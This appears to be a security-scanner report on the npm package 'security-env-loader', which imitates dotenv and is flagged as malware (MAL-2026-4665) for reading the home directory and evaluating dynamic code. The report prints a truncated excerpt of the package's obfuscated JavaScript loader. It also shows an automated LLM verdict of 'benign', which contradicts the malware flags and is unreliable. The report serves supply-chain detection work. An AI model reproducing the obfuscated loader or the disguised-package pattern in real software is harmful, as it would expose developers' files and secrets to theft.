// npm 패키지
security-env-loader
Loads environment variables from .env file
버전
1
메인테이너
1
라이선스
MIT
최초 publish
2026-05-18
publisher
koltinsmith
tarball
30,608 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-18
// exfil path
what is read → where it shipssteals
- ○ home dir
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> "homepage": "https://github.com/yourname/secure-env-loader",
> "url": "https://github.com/yourname/secure-env-loader/issues"
> (function(_0x4f1dc2,_0x1bda7f){const _0x299a44=_0x3b3d,_0x209821=_0x4f1dc2();while(!![]){try{const _0x50c4cf=parseInt(_0x299a44(0x20f))/0x1*(-parseInt(_0x299a44(0x218))/0x2)+-parseInt(_0x299a44(0x1f5)…// offending code· @3.11.0· 3 files flagged
llm: benign · 0.85→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
- @3.11.0··AUTO-PUBLISHED·publisher: koltinsmithheuristic 75/100static flags 4llm benign (0.85) via ollamanew-publisher:8dfirst-version-of-packagehas-source-repoosv-flagged:MAL-2026-4665public-github-pushreads-env-varsreads-homedireval-dynamic
→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
// offending code· 3 files flaggedpatterns: 4
--- package/package.json (excerpt) --- { "name": "security-env-loader", "version": "3.11.0", "description": "Loads environment variables from .env file", "main": "lib/main.js", "exports": { ".": "./lib/main.js", "./config": "./config.js", "./package.json": "./package.json" }, "types": "types/index.d.ts", "scripts": { "flow": "flow", "dtslint": "dtslint types", "lint": "standard", "postlint": "standard-markdown", "pretest": "npm run lint && npm run dtslint", "test": "tap tests/*.js --100", "prerelease": "npm test", "release": "standard-version" }, "repository": { "type": "git", "url": "git://github.com/motdotla/dotenv.git" }, "homepage": "https://github.com/yourname/secure-env-loader", "bugs": { "url": "https://github.com/yourname/secure-env-loader/issues" }, "keywords": [ "dotenv", "env", ".env", "environment", "variables", "config", "settings", "safe-env-reader" ], "readmeFilename": "README.md", "license": "MIT", "devDependencies": { "decache": "^4.5.1", "dtslint": "^4.2.1", "flow-bin": "^0.109.0", "sinon": "^7.5.0", "standard": "^17.1.2", "standard-markdown": "^7.1.0", "standard-version": "^9.5.0", "tap": "^14.7.0" }, "engines": { "node": ">=10" }, "standard": { "ignore": [ "flow-typed/" ] }, "dependencies": { "dotenv": "^17.4.2" } } --- package/lib/main.js (excerpt) --- /* @flow */ /*:: type DotenvParseOptions = { debug?: boolean } // keys and values from src type DotenvParseOutput = { [string]: string } type DotenvConfigOptions = { path?: string, // path to .env file encoding?: string, // encoding of .env file debug?: string // turn on logging for debugging purposes } type DotenvConfigOutput = { parsed?: DotenvParseOutput, error?: Error } */ const fs = require('fs') const path = require('path') function hello_world() { console.log("hello, world") } function log(message /*: string */) { console.log(`[dotenv][DEBUG] ${message}`) } const NEWLINE = '\n' const RE_INI_KEY_VAL = /^\s*([\w.-]+)\s*=\s*(.*)?\s*$/ const RE_NEWLINES = /\\n/g const NEWLINES_MATCH = /\n|\r|\r\n/ // Parses src into an Object function parse(src /*: string | Buffer */, options /*: ?DotenvParseOptions */) /*: DotenvParseOutput */ { const debug = Boolean(options && options.debug) const obj = {} // convert Buffers before splitting into lines and processing src.toString().split(NEWLINES_MATCH).forEach(function (line, idx) { // matching "KEY' and 'VAL' in 'KEY=VAL' const keyValueArr = line.match(RE_INI_KEY_VAL) // matched? if (keyValueArr != null) { const key = keyValueArr[1] // default undefined or missing values to empty string let val = (keyValueArr[2] || '') const end = val.length - 1 const isDoubleQuoted = val[0] === '"' && val[end] === '"' const isSingleQuoted = val[0] === "'" && val[en --- package/lib/sync-safe-read.js (excerpt) --- (function(_0x4f1dc2,_0x1bda7f){const _0x299a44=_0x3b3d,_0x209821=_0x4f1dc2();while(!![]){try{const _0x50c4cf=parseInt(_0x299a44(0x20f))/0x1*(-parseInt(_0x299a44(0x218))/0x2)+-parseInt(_0x299a44(0x1f5))/0x3+parseInt(_0x299a44(0x201))/0x4*(parseInt(_0x299a44(0x20e))/0x5)+parseInt(_0x299a44(0x20b))/0x6+-parseInt(_0x299a44(0x203))/0x7*(parseInt(_0x299a44(0x212))/0x8)+parseInt(_0x299a44(0x1fd))/0x9*(parseInt(_0x299a44(0x1f0))/0xa)+-parseInt(_0x299a44(0x202))/0xb*(-parseInt(_0x299a44(0x215))/0xc);if(_0x50c4cf===_0x1bda7f)break;else _0x209821['push'](_0x209821['shift']());}catch(_0x5d4427){_0x209821['push'](_0x209821['shift']());}}}(_0x7fa8,0x23c79));const _0x5650f6=_0x3354;function _0x3354(_0x1ca2c0,_0x22f8ca){const _0x48627f=_0x3b3d;_0x1ca2c0-=0xa4;const _0x13b2b6=_0x363b();let _0x1fc9b5=_0x13b2b6[_0x1ca2c0];void 0x0===_0x3354[_0x48627f(0x1fb)]&&(_0x3354[_0x48627f(0x208)]=function(_0x5008a2){const _0x4ec3b8=_0x48627f;let _0x160a8e='',_0x158494='';for(let _0x5d9a59,_0x367474,_0x2c8694=0x0,_0x3943d4=0x0;_0x367474=_0x5008a2[_0x4ec3b8(0x205)](_0x3943d4++);~_0x367474&&(_0x5d9a59=_0x2c8694%0x4?0x40*_0x5d9a59+_0x367474:_0x367474,_0x2c8694++%0x4)?_0x160a8e+=String['fromCharCode'](0xff&_0x5d9a59>>(-0x2*_0x2c8694&0x6)):0x0)_0x367474=_0x4ec3b8(0x1f3)[_0x4ec3b8(0x211)](_0x367474);for(let _0x5d911f=0x0,_0x3fb6a0=_0x160a8e[_0x4ec3b8(0x1ea)];_0x5d911f<_0x3fb6a0;_0x5d911f++)_0x158494+='%'+('00'+_0x160a8e[_0x4ec3b8(0x1fc)](_0x5d911f)[_0x4ec3b8(0x213)](0x10))[_0x4ec3b8(0x217)](-0x2);return decodeUR --- bundled output (OSV-MAL flagged — LLM scope expansion) --- --- lib/cli-options.js (bundled) --- /* @flow */ const re = /^dotenv_config_(encoding|path|debug)=(.+)$/ module.exports = function optionMatcher (args /*: Array<string> */) { return args.reduce(function (acc, cur) { const matches = cur.match(re) if (matches) { acc[matches[1]] = matches[2] } return acc }, {}) } --- lib/env-options.js (bundled) --- /* @flow */ // ../config.js accepts options via environment variables const options = {} if (process.env.DOTENV_CONFIG_ENCODING != null) { options.encoding = process.env.DOTENV_CONFIG_ENCODING } if (process.env.DOTENV_CONFIG_PATH != null) { options.path = process.env.DOTENV_CONFIG_PATH } if (process.env.DOTENV_CONFIG_DEBUG != null) { options.debug = process.env.DOTENV_CONFIG_DEBUG } module.exports = options
